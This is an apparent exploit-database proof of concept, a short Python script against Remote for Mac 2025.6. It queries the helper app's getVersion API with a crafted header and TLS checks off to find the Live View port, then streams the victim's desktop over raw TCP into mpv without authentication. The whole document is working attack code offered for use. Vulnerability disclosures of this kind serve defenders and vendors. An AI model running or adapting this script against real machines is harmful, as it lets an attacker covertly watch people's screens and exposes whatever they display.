# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream
Exploit
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6
#!/usr/bin/env python3

'''
Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit
Vulnerable Component: Helper app Live View feature (raw H264 over TCP)
Live View H264 per default is enabled.

- Works when "Allow unknown devices" setting is enabled (default: disabled)
- mpv required
'''

import requests, subprocess, urllib3, sys, time
urllib3.disable_warnings()

def p(s):
    try:
        i,p=s.split(':'); return i, int(p)
    except:
        print("Usage: python live.py <IP:PORT>"); sys.exit(1)

def port(i,pt):
    try:
        r=requests.get(f"https://{i}:{pt}/api/getVersion",
headers={"X-LiveView":"fixed"}, verify=0, timeout=5)
        return r.json().get('liveview.port')
    except:
        return None

def mpv(i,p):
    print("Streaming...")

    process = subprocess.Popen(['mpv', '--no-terminal',
'--profile=low-latency', '--hwdec=auto', '--untimed', '--no-cache',
'--osc=no', '--title=Remote for Mac Stream Exploit', f'tcp://{i}:{p}'])
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        process.terminate()


if __name__ == "__main__":
    if len(sys.argv)!=2: print("Usage: python live.py <IP:PORT>");
sys.exit()
    i,pt = p(sys.argv[1])
    if (lp:=port(i,pt)): mpv(i,lp)
    else: print("Error: No LiveView port")